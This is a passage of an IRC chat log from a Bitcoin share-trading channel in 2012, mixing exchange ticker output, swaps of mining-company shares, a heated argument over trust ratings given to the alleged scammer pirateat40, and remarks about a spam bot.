0.00969899] [Last: 0.109799] [24hVol: 45.68228861] [7dAvg: 0.10446186] Sep 02 02:08:34 smickles i won't bother but im curious how large his asshole is on the mkt. Sep 02 02:08:34 [GLBSE:DMC] [Bid: 0.03501] [Ask: 0.06799] [Spread: 0.03298] [Last: 0.085] [24hVol: 8.00300039] [7dAvg: 0.06076257] Sep 02 02:08:48 .py 0.03501 * 6 Sep 02 02:08:49 0.21006 Sep 02 02:08:57 so you trade .2 for 1 btc ? Sep 02 02:09:02 no wonder nobody takes you seriously. Sep 02 02:09:22 you do realize that means you pay 6 btc for 10 asicminer shares, right? Sep 02 02:09:35 it means i pay 0.21 btc for 1btc worth of asicminer. Sep 02 02:09:41 you said 6 for 10. Sep 02 02:09:55 yes, and the market does not value dmc correctly. Sep 02 02:10:09 yes, and you would be raped unless it wasn't the case nobody cares what you say. Sep 02 02:10:29 [MPEX] [S.MPOE] 50400 @ 0.00039584 = 19.9503 BTC [+] Sep 02 02:10:30 [MPEX] [S.MPOE] 4807 @ 0.0003934 = 1.8911 BTC [-] Sep 02 02:10:43 /*\O Sep 02 02:10:56 anyhow, Obsi, you still trading asicminer for obsi,abmo? Sep 02 02:11:03 yeah Sep 02 02:11:43 Ill trade you 2080 asicminer for 4160 obsi.abmo Sep 02 02:12:00 !ticker obsi.abmo Sep 02 02:12:05 alright, send to Obsi:OBSI.ABMO Sep 02 02:12:31 [GLBSE:OBSI.ABMO] [Bid: 0.05] [Ask: 0.085] [Spread: 0.035] [Last: 0.085] [24hVol: ] [7dAvg: 0.07954545] Sep 02 02:12:36 o yonder glbse the brave, yonder glbse the quick... Sep 02 02:13:17 OBSI.ABMO he's trading 82 to 9. Sep 02 02:13:28 asic miner he's trading 10 to 3 Sep 02 02:13:29 Obsi: sent Sep 02 02:13:38 this is the most ridiculous thing i ever saw in my life Sep 02 02:13:53 Diablo-D3: which account to send to? Sep 02 02:14:06 so Diablo-D3 i'm guessing nao in case someone asks you don't have anymore asicminer to trade at your market forces driven rate of 6 to 10 ? :D Sep 02 02:14:28 mircea_popescu: yup, sorry, all gone Sep 02 02:14:32 ahahahaha Sep 02 02:14:41 mircea_popescu: I was already going to trade these to obsi, I thought you knew Sep 02 02:14:47 Obsi: Diablo-D3:DMC Sep 02 02:14:49 orly. it was an emergency meeting ? Sep 02 02:14:57 mircea_popescu: no, this was planned earlier Sep 02 02:15:04 at the emergency meeting ? Sep 02 02:15:17 no, Obsi passed a motion on ABMO for it Sep 02 02:15:19 like 2 weeks ago Sep 02 02:15:30 on my request Sep 02 02:15:31 lol ok, lets find moar gems, this is becoming fun. Sep 02 02:15:36 [GLBSE] [YABMC] 5 @ 0.1178 = 0.589 BTC [+] Sep 02 02:15:42 mircea_popescu: Im not trading btc-mining or btcmc or abmo Sep 02 02:15:43 !ticker BTC-MINING Sep 02 02:15:45 so theres nothing left Sep 02 02:15:47 o i see. Sep 02 02:15:49 [GLBSE:BTC-MINING] [Bid: 0.9] [Ask: 0.96999] [Spread: 0.06999] [Last: 0.96999] [24hVol: 18.42981] [7dAvg: 0.96263133] Sep 02 02:15:54 jusrt what i was looking at lolz Sep 02 02:16:09 how about HYDRO.BONDS ? Sep 02 02:16:13 !ticker dmc Sep 02 02:16:27 he's almost at 0.005 Sep 02 02:16:28 Ill trade YOUR btc-miing btcmc or abmo for DMC Sep 02 02:16:36 but I wont trade your dmc for them Sep 02 02:16:39 not at those rates you won't lmao./ Sep 02 02:16:44 [GLBSE:DMC] [Bid: 0.1] [Ask: 0.15] [Spread: 0.05] [Last: 0.085] [24hVol: 42.62404855] [7dAvg: 0.0620326] Sep 02 02:16:44 those are core assets. Sep 02 02:16:45 [GLBSE] [OBSI.HRPT] 5 @ 0.103589 = 0.5179 BTC [-] Sep 02 02:16:48 ofcourse you won't, comrade. because your rates are ridiculous. Sep 02 02:16:51 so, HYDRO.BONDS. you got any ? Sep 02 02:16:55 nope Sep 02 02:16:58 see the list Sep 02 02:16:58 right-o. Sep 02 02:16:59 didnt i buy some dmc? Sep 02 02:17:01 I just published it Sep 02 02:17:08 i have no idea Sep 02 02:17:09 coingenuity: dunno, did you? Sep 02 02:17:22 so many people traded into dmc I forget who has and hasnt Sep 02 02:17:27 well this was fun. Sep 02 02:17:30 i dont remember, i dont use glbse at all Sep 02 02:17:36 coingenuity: then you havent Sep 02 02:17:42 Diablo-D3: sent Sep 02 02:17:42 i just remember the first day you made it you asked me to buy some and i dont remember if i did or not Sep 02 02:17:43 if you bought at 1 coingenuity then you've been badly had. Sep 02 02:17:55 [GLBSE] [KRAKEN] 7 @ 0.01 = 0.07 BTC [+] Sep 02 02:18:04 Obsi: btw, do me a favor and run the numbers for abmo Sep 02 02:20:01 sitting on 4810 shares of ASICMINER, 6374 OBSI.1MHS with 120 Ghash on order as of tomorrow Sep 02 02:20:18 20,949 shares outstanding Sep 02 02:20:27 not bad Sep 02 02:20:48 how are you valuing asicminer? at 30? Sep 02 02:21:03 I was just about to ask you the same Sep 02 02:21:08 not sure how to value it Sep 02 02:21:12 Im doing 30, thats whats been announced Sep 02 02:21:15 it should be at least that Sep 02 02:21:33 at 30 as in, 30 btc ?! Sep 02 02:21:33 I wanna do 155, but thats too far in the future Sep 02 02:21:37 30 mhash, mircea_popescu Sep 02 02:21:40 o. Sep 02 02:21:46 [MPEX] [S.MPOE] 7051 @ 0.0003934 = 2.7739 BTC [-] Sep 02 02:21:48 [MPEX] [S.MPOE] 7600 @ 0.00039332 = 2.9892 BTC [-] Sep 02 02:21:49 [MPEX] [S.MPOE] 20649 @ 0.00039323 = 8.1198 BTC [-] Sep 02 02:21:55 Obsi: so thats 12.920 mhash per abmo Sep 02 02:21:56 so share trades at .1 you value it like giga's, which is 8x that Sep 02 02:22:11 mircea_popescu: giga's market prices are extremely unrealistic Sep 02 02:22:18 if Im buying, I buy whoevers cheapest Sep 02 02:22:35 well with ASICMINER at 30 mhash that puts OBSI.ABMO at ~12.9 mhash per share when BFL & ASICMINER deliver Sep 02 02:22:35 i see. Sep 02 02:23:15 Obsi: heh :3 Sep 02 02:23:42 is friedcat still accepting board members with > 5000 shares? Sep 02 02:23:54 Obsi: BTC-Mining says no Sep 02 02:24:01 but deadterra disagreed with that Sep 02 02:24:03 and hes on the board Sep 02 02:24:20 I havent gotten an answer out of friedcat because I forgot to ask him Sep 02 02:25:30 [MPEX] [F.GIGA.ETF] 41 @ 0.00090384 = 0.0371 BTC [+] Sep 02 02:25:30 [MPEX] [F.GIGA.ETF] 11784 @ 0.00090386 = 10.6511 BTC [+] Sep 02 02:25:32 [MPEX] [F.GIGA.ETF] 775 @ 0.00090794 = 0.7037 BTC [+] Sep 02 02:25:50 OT: anyone here want to buy me a 24.99 amazon gc for 2.499btc? Sep 02 02:26:27 they let you buy GC with GC code? Sep 02 02:27:13 Obsi: no. Sep 02 02:27:52 sucks, got one in my wallet for $81, guess I'll just get prime Sep 02 02:27:55 [GLBSE] [FUTUREFUND] 12 @ 0.000121 = 0.0015 BTC [+] Sep 02 02:28:05 [GLBSE] [TYGRR.BOND-P] 10 @ 0.11 = 1.1 BTC [-] Sep 02 02:28:06 [GLBSE] [TYGRR.BOND-P] 290 @ 0.103 = 29.87 BTC [-] Sep 02 02:28:10 prime isnt worth it unless you're a big amazon buyer Sep 02 02:29:19 [GLBSE] [OBSI.ABMO] 100 @ 0.085 = 8.5 BTC [+] Sep 02 02:29:21 [GLBSE] [OBSI.ABMO] 100 @ 0.09 = 9 BTC [+] Sep 02 02:30:45 [GLBSE] [ASICMINER] 54 @ 0.109699 = 5.9237 BTC [-] Sep 02 02:30:46 [GLBSE] [ASICMINER] 75 @ 0.109799 = 8.2349 BTC [+] Sep 02 02:30:47 [GLBSE] [ASICMINER] 1 @ 0.1098999 BTC [+] Sep 02 02:31:15 [GLBSE] [TYGRR.BOND-P] 10 @ 0.103 = 1.03 BTC [-] Sep 02 02:31:15 [GLBSE] [TYGRR.BOND-P] 100 @ 0.102 = 10.2 BTC [-] Sep 02 02:31:17 [GLBSE] [TYGRR.BOND-P] 146 @ 0.101005 = 14.7467 BTC [-] Sep 02 02:31:18 [GLBSE] [TYGRR.BOND-P] 24 @ 0.1 = 2.4 BTC [-] Sep 02 02:31:35 [GLBSE] [ASICMINER] 29 @ 0.1098999 = 3.1871 BTC [+] Sep 02 02:31:37 [GLBSE] [ASICMINER] 1 @ 0.10989999 BTC [+] Sep 02 02:31:38 [GLBSE] [ASICMINER] 10 @ 0.10999999 = 1.1 BTC [+] Sep 02 02:31:39 [GLBSE] [ASICMINER] 20 @ 0.10999999 = 2.2 BTC [+] Sep 02 02:32:00 heh, whats with all the purchasing going on Sep 02 02:32:18 buying some ASICMINER to try and get on board with ABMO Sep 02 02:32:29 ahh okay Sep 02 02:32:32 good luck on that Sep 02 02:32:53 [GLBSE] [BFLS] 1 @ 1 BTC [+] Sep 02 02:32:54 why do you want to be on the board ? Sep 02 02:32:54 [GLBSE] [BFLS] 8 @ 1.01 = 8.08 BTC [+] Sep 02 02:33:03 more info sooner Sep 02 02:33:23 i generally turn down invites to be on various boards. not usu worth my time Sep 02 02:33:24 yeah, they have a private list Sep 02 02:33:37 mircea_popescu: when you have something like 1000 btc invested in their shit Sep 02 02:33:41 you get on the board Sep 02 02:33:58 hm. sounds like you don't, you just get some preferred status or w/e Sep 02 02:34:06 you know what a board is right ? Sep 02 02:34:12 yes, I know what a board is Sep 02 02:34:14 and thats a board Sep 02 02:34:18 a ok then Sep 02 02:34:26 you have direct voting access on issues Sep 02 02:34:36 well moreover, you appoint the ceo etc. Sep 02 02:34:48 you can Sep 02 02:34:55 no. you do. that's what the board does. Sep 02 02:34:56 but I dont think you can actually fire friedcat Sep 02 02:35:02 well... in that case... Sep 02 02:35:05 NOT A BOARD IS IT Sep 02 02:35:06 firing him would basically mean no company Sep 02 02:35:10 right-o. Sep 02 02:35:19 this is why dmc doesnt have a board Sep 02 02:35:26 you cant fire the only employee. Sep 02 02:35:28 this is why nobody does. Sep 02 02:39:05 [MPEX] [F.GIGA.ETF] 9900 @ 0.00089244 = 8.8352 BTC [-] Sep 02 02:39:06 [MPEX] [F.GIGA.ETF] 3600 @ 0.00088595 = 3.1894 BTC [-] Sep 02 02:39:16 DMC also only has one share class and only ever will have one share class Sep 02 02:39:48 so its easier to just do motions Sep 02 02:40:07 and it has some mystery large investor so it's easier to not even do them. Sep 02 02:41:06 yeah Sep 02 02:41:31 plus, I wont approve of shit going up for motion if its really stupid Sep 02 02:41:53 investor majority rules, investors cant vote to shoot themselves in the foot, seems to work. Sep 02 02:41:56 or there's an emergency meeting. Sep 02 02:42:05 I dont have emergency meetings =P Sep 02 02:42:10 [MPEX] [S.MPOE] 19239 @ 0.00039638 = 7.626 BTC [+] Sep 02 02:42:11 [MPEX] [S.MPOE] 26461 @ 0.00040217 = 10.6418 BTC [+] Sep 02 02:42:17 unless an emergency update happens, it changes on the first Sep 02 02:42:18 I have emergency midnight snacks. Sep 02 02:42:29 [GLBSE] [GIGAMINING] 6 @ 0.8211 = 4.9266 BTC [-] Sep 02 02:42:29 mircea_popescu: yes, an update is unliateral Sep 02 02:42:30 [GLBSE] [GIGAMINING] 9 @ 0.821 = 7.389 BTC [-] Sep 02 02:42:31 [GLBSE] [GIGAMINING] 2 @ 0.820201 = 1.6404 BTC [-] Sep 02 02:42:32 and they only go up. Sep 02 02:42:39 the number NEVER goes down Sep 02 02:42:45 right, but it's the result of the emergency meeting neh ? Sep 02 02:42:51 nope, no meeting Sep 02 02:43:07 I look at market prices nd go "hey, mhash is on sale!" and adjust accordingly. Sep 02 02:43:33 o i see. Sep 02 02:43:42 for my curiousity, how much iof your own personal cash went into dmc ? Sep 02 02:43:52 all of the spare cash I had. Sep 02 02:43:56 its not much, but it went in. Sep 02 02:44:06 specifically ? Sep 02 02:44:17 hrm, I bought 15 shares at 1 btc when dmc started Sep 02 02:44:21 and I own about 40 some now Sep 02 02:44:24 so for 15 btc Sep 02 02:44:31 you've been in charge of this insanity ? Sep 02 02:44:39 [GLBSE] [TYGRR.BOND-P] 50 @ 0.199 = 9.95 BTC [+] Sep 02 02:44:40 i am amazed you're allowed to do this, honestly. Sep 02 02:44:41 and all dividends I get go back in to buy more dmc Sep 02 02:44:48 mircea_popescu: well thats the thing Sep 02 02:44:59 if people really knew how startups started Sep 02 02:45:00 ya ya, open market, i hear ya. Sep 02 02:45:05 they'd flip out all the time Sep 02 02:45:16 [GLBSE] [MOVETO.FUND] 1 @ 1.1349 BTC [+] Sep 02 02:45:17 [GLBSE] [MOVETO.FUND] 2 @ 1.135 = 2.27 BTC [+] Sep 02 02:45:23 i'm really shocked anyone earnestly thinks glbse will be getting actual investor bitcoins in the future, tho. Sep 02 02:45:36 well, I tried. Sep 02 02:45:41 that just sorta fell flat Sep 02 02:46:34 its hard to get investors period Sep 02 02:46:40 even if you dont have the stone of btc around your neck Sep 02 02:47:06 (the stone around your neck of btc? btc as a stone around your neck? something) Sep 02 02:49:21 [GLBSE] [TYGRR.BOND-P] 25 @ 0.199 = 4.975 BTC [+] Sep 02 02:50:58 mircea_popescu: I dunno, I can only do what I can Sep 02 02:51:09 right. Sep 02 02:51:28 I think DMC will still attract new money to bitcoin, but its going to take longer than I thought Sep 02 02:51:37 it doesnt help bitcoinica and pirate basically fucked everything Sep 02 02:51:49 i think you're completely deluded. Sep 02 02:53:45 rome was not built overnight. Sep 02 02:58:06 that has nothing to do with it. Sep 02 02:59:26 mircea_popescu: okay so Sep 02 02:59:33 dmc's purpose is to sell a service and make money Sep 02 02:59:37 MrTiggr do you have an article on the global scam exchange yet ? you can use this http://polimedia.us/dtng/c/src/134654389322.png Sep 02 03:00:45 lol Sep 02 03:01:02 [GLBSE] [TEEK.B] 2 @ 0.78 = 1.56 BTC [-] Sep 02 03:01:04 [GLBSE] [TEEK.B] 5 @ 0.7751 = 3.8755 BTC [-] Sep 02 03:01:05 [GLBSE] [TEEK.B] 1 @ 0.775 BTC [-] Sep 02 03:01:06 [GLBSE] [TEEK.B] 30 @ 0.77 = 23.1 BTC [-] Sep 02 03:05:33 [GLBSE] [PPT.DIV] 3 @ 0.02 = 0.06 BTC [-] Sep 02 03:05:35 [GLBSE] [PPT.DIV] 16 @ 0.01 = 0.16 BTC [-] Sep 02 03:05:36 [GLBSE] [PPT.DIV] 20 @ 0.01 = 0.2 BTC [-] Sep 02 03:09:00 well that was a nice session of coding with minimal interruptions Sep 02 03:10:31 you missed out. Sep 02 03:10:37 oh? Sep 02 03:13:42 [GLBSE] [JAH] 1 @ 0.15 BTC [-] Sep 02 03:16:34 [GLBSE] [NYAN.C] 1 @ 0.78 BTC [+] Sep 02 03:17:05 hey Diablo-D3, will your vps and dedi offerings allow IRC and tor exit nodes? Sep 02 03:17:06 [GLBSE] [TYGRR.BOND-P] 2 @ 0.199 = 0.398 BTC [+] Sep 02 03:17:19 Ignatius-otc: irc yes but not to efnet Sep 02 03:17:22 efnet will be blocked. Sep 02 03:25:02 [MPEX] [S.MPOE] 40500 @ 0.00039827 = 16.1299 BTC [-] Sep 02 03:25:03 [MPEX] [S.MPOE] 2920 @ 0.00039575 = 1.1556 BTC [-] Sep 02 03:27:08 [MPEX] [S.MPOE] 1000 @ 0.0004 = 0.4 BTC [+] Sep 02 03:27:10 [MPEX] [S.MPOE] 4000 @ 0.00040217 = 1.6087 BTC [+] Sep 02 03:27:23 o srsly, over 40k !? Sep 02 03:27:36 ;;ticker Sep 02 03:27:37 Best bid: 9.97, Best ask: 9.98, Bid-ask spread: 0.01000, Last trade: 9.9501, 24 hour volume: 21510, 24 hour low: 9.77635, 24 hour high: 10.29 Sep 02 03:27:41 aww crud! Sep 02 03:27:47 just when i was about to be over 4mn :( Sep 02 03:28:02 peeps cashing out? Sep 02 03:28:14 of bitcoin ? maybe Sep 02 03:28:20 seems insane tho, with the crap going on in the us. Sep 02 03:28:47 yeah, we need more shit in europe Sep 02 03:28:49 i only cash out to buy things that require usd :/ Sep 02 03:28:58 smickles i haven't yet cashed out. Sep 02 03:29:05 not one single btc. Sep 02 03:29:13 nice Sep 02 03:29:16 well actually sold a couple to some romanian guy Sep 02 03:29:27 mostly to get ppl started i'll ocasionally do small sums like that. Sep 02 03:30:21 ;;bc,24hprc Sep 02 03:30:22 9.97 Sep 02 03:30:27 wow no way ?! Sep 02 03:31:09 it was 10 not to long ago Sep 02 03:34:14 [GLBSE] [JAH] 2 @ 0.15999 = 0.32 BTC [+] Sep 02 03:39:26 [GLBSE] [V.HRL] 2 @ 1 = 2 BTC Sep 02 03:39:53 [GLBSE] [TEEK.B] 2 @ 0.9146 = 1.8292 BTC [+] Sep 02 03:47:26 [GLBSE] [V.HRL] 3 @ 1 = 3 BTC Sep 02 03:54:32 [MPEX] [F.GIGA.ETF] 5226 @ 0.00088595 = 4.63 BTC [-] Sep 02 03:54:33 [MPEX] [F.GIGA.ETF] 465 @ 0.00088391 = 0.411 BTC [-] Sep 02 03:54:33 [MPEX] [F.GIGA.ETF] 10300 @ 0.00088088 = 9.0731 BTC [-] Sep 02 03:54:34 [MPEX] [F.GIGA.ETF] 4856 @ 0.00087252 = 4.237 BTC [-] Sep 02 03:54:35 [MPEX] [F.GIGA.ETF] 12040 @ 0.00086993 = 10.474 BTC [-] Sep 02 03:54:37 [MPEX] [F.GIGA.ETF] 919 @ 0.0008551 = 0.7858 BTC [-] Sep 02 03:54:38 [MPEX] [F.GIGA.ETF] 1194 @ 0.0008253 = 0.9854 BTC [-] Sep 02 04:18:53 [GLBSE] [TEEK.B] 5 @ 0.6199 = 3.0995 BTC [-] Sep 02 04:27:49 [GLBSE] [BTC-BOND] 60 @ 0.01 = 0.6 BTC [+] Sep 02 04:29:59 [GLBSE] [KRAKEN] 5 @ 0.01 = 0.05 BTC [+] Sep 02 04:30:15 Go Kraken + BTC-BOND Sep 02 04:33:05 [MPEX] [F.GIGA.ETF] 15260 @ 0.0008253 = 12.5941 BTC [-] Sep 02 04:33:06 [MPEX] [F.GIGA.ETF] 2740 @ 0.00081962 = 2.2458 BTC [-] Sep 02 04:36:03 [MPEX] [S.MPOE] 12520 @ 0.00039575 = 4.9548 BTC [-] Sep 02 04:36:04 [MPEX] [S.MPOE] 16780 @ 0.00039323 = 6.5984 BTC [-] Sep 02 04:43:38 [GLBSE] [MOVETO.FUND] 7 @ 1.135 = 7.945 BTC [+] Sep 02 04:44:26 [GLBSE] [ASICMINER] 2 @ 0.1135 = 0.227 BTC [+] Sep 02 04:45:30 [GLBSE] [MOVETO.FUND] 11 @ 1.18797156 = 13.0677 BTC [+] Sep 02 04:46:01 [GLBSE] [MMM] 5 @ 0.89 = 4.45 BTC [+] Sep 02 04:46:03 [GLBSE] [MMM] 45 @ 0.9 = 40.5 BTC [+] Sep 02 04:58:54 [GLBSE] [GIGAMINING] 1 @ 0.8499 BTC [+] Sep 02 05:00:49 [GLBSE] [BITBOND] 1 @ 0.4694 BTC [-] Sep 02 05:01:46 [GLBSE] [COGNITIVE] 1 @ 0.6486 BTC [-] Sep 02 05:05:28 [GLBSE] [PUREMINING] 1 @ 0.09339999 BTC [-] Sep 02 05:05:37 7761 grubles 98 pirateat40 2012-08-31 18:43:28 10 trustedat40 Sep 02 05:05:37 7853 gigavps 256 pirateat40 2012-08-30 22:29:00 10 all business, no drama Sep 02 05:05:43 lmao. people like pirape at 40. Sep 02 05:06:02 haters gonna hate Sep 02 05:06:40 mircea_popescu: the question of the hour is....where the butt pics at Sep 02 05:06:41 jcpham http://bitcoin-otc.com/viewratingdetail.php?nick=psykick&sign=ANY&type=RECV Sep 02 05:06:51 this would seem to be a shill account made strictly to manipulatye the wot Sep 02 05:06:55 why exactly have you rated it ? Sep 02 05:06:58 i demand female butt pics Sep 02 05:07:01 you have provided before Sep 02 05:07:08 so where are they Sep 02 05:07:10 i'm not talking to you grubles. Sep 02 05:07:21 you just did Sep 02 05:08:12 no, i just pointed out that you're supporting a scammer. Sep 02 05:08:36 rated pirate a 10 yestreday? Sep 02 05:08:36 oh jeez here we go Sep 02 05:08:43 where is your proof? Sep 02 05:08:53 august the 17th came and went. Sep 02 05:09:04 end of story, right there. Sep 02 05:09:12 zzz Sep 02 05:09:19 how could you or giga rate pirate a 10 Sep 02 05:09:24 andno drama??? wtf? Sep 02 05:09:30 they are insane, basically. Sep 02 05:09:45 inever trusted otc anyway Sep 02 05:09:47 let's not turn #bitcoin-assets into #btcst Sep 02 05:10:10 i always have trusted otc. the trick is to keep track of whose ratings are shilled out. Sep 02 05:10:49 right, im a shill Sep 02 05:10:55 yes. yes you are. Sep 02 05:10:55 you caught me! Sep 02 05:11:12 and you might be irrespionsible enough to not realise this, but you're fucking over a lot of people. Sep 02 05:11:22 no wonder pirate doesnt talk on irc / bitcointalk anymore Sep 02 05:11:31 you know, the sort of people that build things, like the wot, and the sort of people that are new to bitcoin, and believe what they see there. Sep 02 05:11:36 grubles++, people are being unreasonable Sep 02 05:11:41 yes, scammers rarely talk in open channels. Sep 02 05:11:49 they need a little court to prop their pretense up. Sep 02 05:12:07 if im a shill, and i havent met pirate in person (like Chaaang-Noi), how exactly am I a shill? Sep 02 05:12:21 if you haven't met him in person and you rated him a 10... Sep 02 05:12:24 cuz i met a guy ima shill? Sep 02 05:12:27 you're already stepping in your own mouth. Sep 02 05:12:50 grubles is legit Sep 02 05:12:59 i used to think so myself. Sep 02 05:13:13 mircea_popescu you understand the word faith right Sep 02 05:13:25 yes, i do. i also understand the word "responsibility". Sep 02 05:13:33 and you know how to take those ratings witha grain of salt Sep 02 05:13:37 you can't rate a dude 10 you've never met, and you can't rate pirate a 10 on august the 30th. Sep 02 05:13:46 i suppose Sep 02 05:13:46 yes, i do. the noobs do not, however. Sep 02 05:13:48 lol i rated him months before that Sep 02 05:13:51 i just updated it Sep 02 05:13:55 gtfo Sep 02 05:14:56 i get it and all but i don't like the polarization Sep 02 05:15:06 obviously some one will be right and someone will be wrong Sep 02 05:15:13 it has to occur. we can't forever pretend o, he's paying another account next week, maybe it's ok. Sep 02 05:15:14 just need more time to figure it out Sep 02 05:15:17 i didnt even change the 10, i just changed my comment Sep 02 05:15:41 grubles it still looks awful. Sep 02 05:15:50 well yeah to you Sep 02 05:16:04 jcpham is right, let's just wait and see what happen. I've put a -1 for being late until issues are resolved. Seems fine like that to me. Sep 02 05:16:17 grubles/giga/etc already had a high rating for pirate by the way Sep 02 05:16:28 he had a 6 from me Sep 02 05:16:29 no drama ?! are you kidding me ?! Sep 02 05:16:33 all the guy is doing is making drama. Sep 02 05:16:34 I looked at his otc before rating. Sep 02 05:16:39 he can have the 6 back too Sep 02 05:16:41 everyone but pirate is creating the drama Sep 02 05:16:48 jcpham what i was curious about was the user psykick Sep 02 05:16:59 you gave him a 1, pirate gave him a 5, he gave pirate a 10 back and that's all. Sep 02 05:17:00 it's not his fault there are bitlanes etc. in the community Sep 02 05:17:07 psy said it wasa joke Sep 02 05:17:09 psy is a form mod Sep 02 05:17:13 forum mod Sep 02 05:17:19 that's psy ?! sigh. Sep 02 05:17:22 teh trollage in wot now :( Sep 02 05:17:25 i was trying to give him some rep Sep 02 05:17:31 ! Sep 02 05:17:43 [GLBSE] [PAJKA.BOND] 1 @ 0.079 BTC [+] Sep 02 05:17:44 yeah trolling in wot Sep 02 05:17:49 why use wot... Sep 02 05:18:04 why use wot... << exactly what i don't want to see ;/ Sep 02 05:18:19 fucking forum idiots a la psy are ruining the wot deliberately, you're enabling this. Sep 02 05:18:25 yes Sep 02 05:18:49 ;;unrate psykick Sep 02 05:18:51 Successfully removed your rating for psykick. Sep 02 05:18:53 boosh Sep 02 05:19:18 i honestly don't think we got a prayer going forward w/o a wot. Sep 02 05:19:22 hasta be serious biznis. Sep 02 05:19:40 yes it is pretty important Sep 02 05:21:00 Can anyone explain me how the goatse dude spams in the freenode status window? Sep 02 05:21:11 he does ? Sep 02 05:21:18 Yes dammit Sep 02 05:21:18 notices i think Sep 02 05:21:34 i havent been getting any buttspam recently Sep 02 05:21:41 Maybe... I just wonder how it can be possible to send text there Sep 02 05:21:57 the more you talk in the otc, the more likely it seems to happen Sep 02 05:22:19 /notice Sep 02 05:22:19 maybe he sends you some direct stuff ? Sep 02 05:22:26 Usage: NOTICE , sends a notice. Notices are a type of message that should be auto reacted to Sep 02 05:22:36 Usage: NOTICE , sends a notice. Notices are a type of message that should be auto reacted to Sep 02 05:22:37 I see that right here in red, not in the status window Sep 02 05:22:45 >mircea_popescu< hi Sep 02 05:22:45 -mircea_popescu- hi Sep 02 05:22:50 hm Sep 02 05:22:50 but yeah, same color Sep 02 05:23:01 -mircea_popescu- hi Sep 02 05:23:06 maybe because im in the same channel Sep 02 05:23:08 as you Sep 02 05:23:20 aye, no idea Sep 02 05:23:29 that goatse bot joins a channel, makes a list of who is in the channel, and then /notices everyone goatse Sep 02 05:23:39 eh, maybe Sep 02 05:23:43 joins, makes list, then parts Sep 02 05:23:44 why's freenode not klining it anyway Sep 02 05:24:16 they do, he comes back with another username each time Sep 02 05:24:22 spamming for his 150 BTC Sep 02 05:24:24 yeah Sep 02 05:24:27 what 150 btc ?! Sep 02 05:24:42 Trying to prostitute his ass for money, except no one is interested Sep 02 05:24:47 I wonder if he realizes pirate isnt on irc Sep 02 05:24:59 In the goatse, the first line is Sep 02 05:25:06 [14:34] -iwtwiqgk- r | * \ \_-~ i want my 150 BTC ~-_\ | * 12SBihiWqxWRqkdU7zaGSuxhCyvcU6Mg8B Sep 02 05:25:21 o, so some "investor" that got burnt ? Sep 02 05:26:02 anyway Sep 02 05:26:05 im going to the bar Sep 02 05:26:07 aye, the last line is Sep 02 05:26:08 later Sep 02 05:26:09 [14:34] -iwtwiqgk- { | a | make it stop / | | \ 150 BTC | a http://goo.gl/oTdER Sep 02 05:26:41 lol ppl keep senfing him btc, there's 33 Sep 02 05:27:06 wait really? Sep 02 05:27:09 -.- Sep 02 05:27:30 seems so Sep 02 05:28:19 some people... Sep 02 05:28:20 Obsi: so, whats left for abmo to pay for? Sep 02 05:28:51 people should be thankful to that guy that finally came forward with pirate nonpayment. Sep 02 05:29:06 douche was prolly doing it for months, all the moonstruck idiots stringing along to his crap. Sep 02 05:29:07 Diablo-D3: tomorrow will buy the last upgrade, then prolly take a stance of waiting to see what happens in ASIC land... maybe pay divs until then Sep 02 05:29:20 kay Sep 02 05:29:27 I'd like to see dividends Sep 02 05:29:40 !ticker btc-mining Sep 02 05:29:42 [GLBSE:BTC-MINING] [Bid: 0.9] [Ask: 0.96999] [Spread: 0.06999] [Last: 0.96999] [24hVol: 18.42981] [7dAvg: 0.96263133] Sep 02 05:29:43 !ticker btcmc Sep 02 05:29:45 !ticker obsi.abmo Sep 02 05:29:45 [GLBSE:BTCMC] [Bid: 0.5001] [Ask: 0.58] [Spread: 0.0799] [Last: 0.40000002] [24hVol: ] [7dAvg: 0.46278571] Sep 02 05:29:46 k, will put a motion in this week Sep 02 05:29:48 [GLBSE:OBSI.ABMO] [Bid: 0.05] [Ask: 0.1] [Spread: 0.05] [Last: 0.09] [24hVol: 17.5] [7dAvg: 0.08076922] Sep 02 05:30:31 yeah, I need to buy a lot more btc-mining Sep 02 05:30:41 because now abmo is overweighted in the portfolio =P Sep 02 05:31:02 ;;rated bitlane Sep 02 05:31:02 You have not yet rated user bitlane Sep 02 05:31:10 ;;getrating bitlane Sep 02 05:31:10 This user has not yet been rated. WARNING: Currently not authenticated. Sep 02 05:31:22 lmao doesn't even have an id. Sep 02 05:31:53 lets see if I can cross 8 mhash/share by the end of the month Sep 02 05:32:26 [GLBSE] [COGNITIVE] 1 @ 0.6486 BTC [-] Sep 02 05:33:32 Obsi: lol, I own almost half of ABMO Sep 02 05:33:39 thanks for your trust, Diablo Sep 02 05:34:08 Obsi: 21329 out, 9273 of them are mine Sep 02 05:34:37 BTC-Mining: I have 40 of you. Sep 02 05:35:13 !ticker abmo Sep 02 05:35:15 Invalid ticker. Sep 02 05:35:20 !ticker obsi.abmo Sep 02 05:35:20 mk Sep 02 05:35:22 [GLBSE:OBSI.ABMO] [Bid: 0.05] [Ask: 0.1] [Spread: 0.05] [Last: 0.09] [24hVol: 17.5] [7dAvg: 0.08076922] Sep 02 05:35:27 [GLBSE] [ASICMINER] 3 @ 0.1135 = 0.3405 BTC [+] Sep 02 05:35:28 [GLBSE] [ASICMINER] 59 @ 0.11368889 = 6.7076 BTC [+] Sep 02 05:35:29 [GLBSE] [ASICMINER] 70 @ 0.1136889 = 7.9582 BTC [+] Sep 02 05:35:30 [GLBSE] [ASICMINER] 67 @ 0.11368898 = 7.6172 BTC [+] Sep 02 05:35:30 [GLBSE] [ASICMINER] 30 @ 0.11368899 = 3.4107 BTC [+] Sep 02 05:35:32 [GLBSE] [ASICMINER] 21 @ 0.11378899 = 2.3896 BTC [+] Sep 02 05:35:38 !ticker asicminer Sep 02 05:35:39 [GLBSE:ASICMINER] [Bid: 0.10101] [Ask: 0.11378899] [Spread: 0.01277899] [Last: 0.11378899] [24hVol: 90.40650396] [7dAvg: 0.10512931] Sep 02 05:35:46 im so curious where the miner stuff will be in ~3 months... Sep 02 05:36:04 mircea_popescu: well, you have a small handful of choices Sep 02 05:36:14 invest in BTC-Mining, asicmining, me, or abmo Sep 02 05:36:20 or giga->tera Sep 02 05:36:27 or btcmc Sep 02 05:36:35 and giga is waaaaaaaaay overpriced Sep 02 05:36:42 The rest goes down the drain Sep 02 05:36:44 yeah, except i don't think any of these will be worth 1/2 what they are now on xmas eve. Sep 02 05:36:57 [GLBSE] [ASICMINER] 8 @ 0.11378899 = 0.9103 BTC [+] Sep 02 05:36:59 mircea_popescu: asicminer will continue to go up Sep 02 05:37:04 you're not buying only asic mining power Sep 02 05:37:10 you're buying into unit profit sales Sep 02 